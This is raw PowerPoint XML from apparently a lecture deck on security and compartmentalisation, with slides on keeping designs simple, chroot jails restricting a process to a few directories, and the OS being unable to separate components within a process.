              </a:rPr>
              <a:t>Moral of the story (1) :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KEEP IT SIMPLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moral of the story (2)     :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If it is not simple, check the details </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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7FEAEFE-8B51-5655-9B0A-4263875828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4601C655-20E5-4606-8FB3-77C78869977F}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23557" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2034AA51-E99F-0D75-9C12-618DCBFD0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t="14346" r="11583" b="5707"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="863600" y="1930400"/>
            <a:ext cx="82804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2410EA-6F89-8016-99BA-46639BA6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044C6-A640-E69B-2C00-258818A8E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Compartmentilisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within a process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>supported by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programming language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eg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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java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/>
              <a:t>supported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hardware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eg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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intel SGX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Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compartmentalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a great idea!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But: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compartmentalisation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can fail or simply not be used </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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E16162-0509-898B-2AF8-4A98B66B240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0A38BE8-000D-40C1-8DA3-275AD2DED710}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>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04069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84D950B-7D23-BE29-E2EB-84232EE47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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t> jail</a:t>
            </a:r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44E22-54CE-C3AC-F368-F7356C9FC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buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - change root - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>compartmentalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               (of file system) in UNIX/Linux. It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>coarse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>restricts access of a process to a subset of file system,                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>. changes the root of file system for that process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> running an application you just downloaded with  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="551"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="18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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="18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sos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="18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erik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/trial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="551"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>       restricts access to just these two directories</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0066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100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="551"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Using traditional OS access control permissions for this would be very tricky! It would require getting permissions right all over the file system.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3CF2E6DC-67A3-D2B5-BE26-A5CA2EBCCA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111EE45-B4F9-4DC0-B7F8-45576AE91BC5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-N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2F9EEBB-4E2D-A1FF-C721-59C0A7981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nl-NL"/>
              <a:t>Limits in granularity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9963CBCE-9E7B-FAE1-88D5-5127BA7244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en-GB" altLang="en-US"/>
              <a:t>OS can’t distinguish components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" i="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t> process, so can’t differentiate access control for them, or do access control between them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25604" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DB83CE9-637F-C9DF-2F8B-17EBA033485A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1133475" y="1947863"/>
            <a:ext cx="7296150" cy="5116512"/>
            <a:chOff x="1224018" y="2208213"/>
            <a:chExt cx="7296095" cy="5116512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25618" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA009B56-8FF4-0131-3B46-F01E41106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018" y="4494213"/>
              <a:ext cx="827087" cy="1163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619" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC22F1F9-AC91-93F3-47DA-D67DC293B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825" y="5565775"/>
              <a:ext cx="6364288" cy="549275"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 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 sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Hardware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> (CPU, memory, I/O peripherals)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25620" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{442181AA-3C81-E278-BD01-C70EB1C99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138" y="2208213"/>
              <a:ext cx="4357687" cy="2543175"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 74"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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/>
                <a:t>process A</a:t>
              </a:r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2400"/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2400"/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2400"/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2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25621" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C479BA9-38E6-6FA7-B888-7DD8C60CC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700" y="4922838"/>
              <a:ext cx="6335713" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 273"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66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 sz="2400"/>
                <a:t>Operating System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25622" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3E8AB9-12D9-0A14-372F-6DB2326F92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900" y="6246813"/>
              <a:ext cx="91122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5623" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D94573-7B87-CB7A-5A70-5988D0393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222" b="40233"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3365500" y="6254750"/>
              <a:ext cx="223202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5624" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5D36D2-AEBF-9659-ABF7-0DB786D42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850" y="6202363"/>
              <a:ext cx="957263" cy="112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625" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0749C47-F447-0A81-16ED-79EDC1DD5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2732" y="2208213"/>
              <a:ext cx="1428750" cy="2543175"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 74"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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/>
                <a:t>process B</a:t>
              </a:r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2400"/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2400"/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2400"/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2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25626" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD9070D-BD16-CC0D-B137-8BA73C50B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2875" y="2994025"/>
              <a:ext cx="3714750" cy="1500188"/>
              <a:chOff x="2468564" y="1851011"/>
              <a:chExt cx="4468152" cy="1500202"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25627" name="AutoShape 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D47D7F1-6DED-1029-5BAD-1759BB18B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8564" y="1851011"/>
                <a:ext cx="4468152" cy="1500202"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 93"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF950E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0000" tIns="45000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1"/>
              <a:lstStyle>
                <a:lvl1pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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1pPr>
                <a:lvl2pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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2pPr>
                <a:lvl3pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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3pPr>
                <a:lvl4pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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4pPr>
                <a:lvl5pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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algn="ctr" eaLnBrk="1">
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-US" altLang="nl-NL" sz="2400" b="1"/>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1">
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="nl-NL" sz="2400" b="1"/>
                  <a:t>  </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25628" name="AutoShape 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79055C04-2DB5-F0F8-336D-895404894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874" y="2136775"/>
                <a:ext cx="1714496" cy="1000125"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 130"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF950E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0000" tIns="45000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1"/>
              <a:lstStyle>
                <a:lvl1pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="7239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1pPr>
                <a:lvl2pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="7239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2pPr>
                <a:lvl3pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="7239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3pPr>
                <a:lvl4pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="7239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4pPr>
                <a:lvl5pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
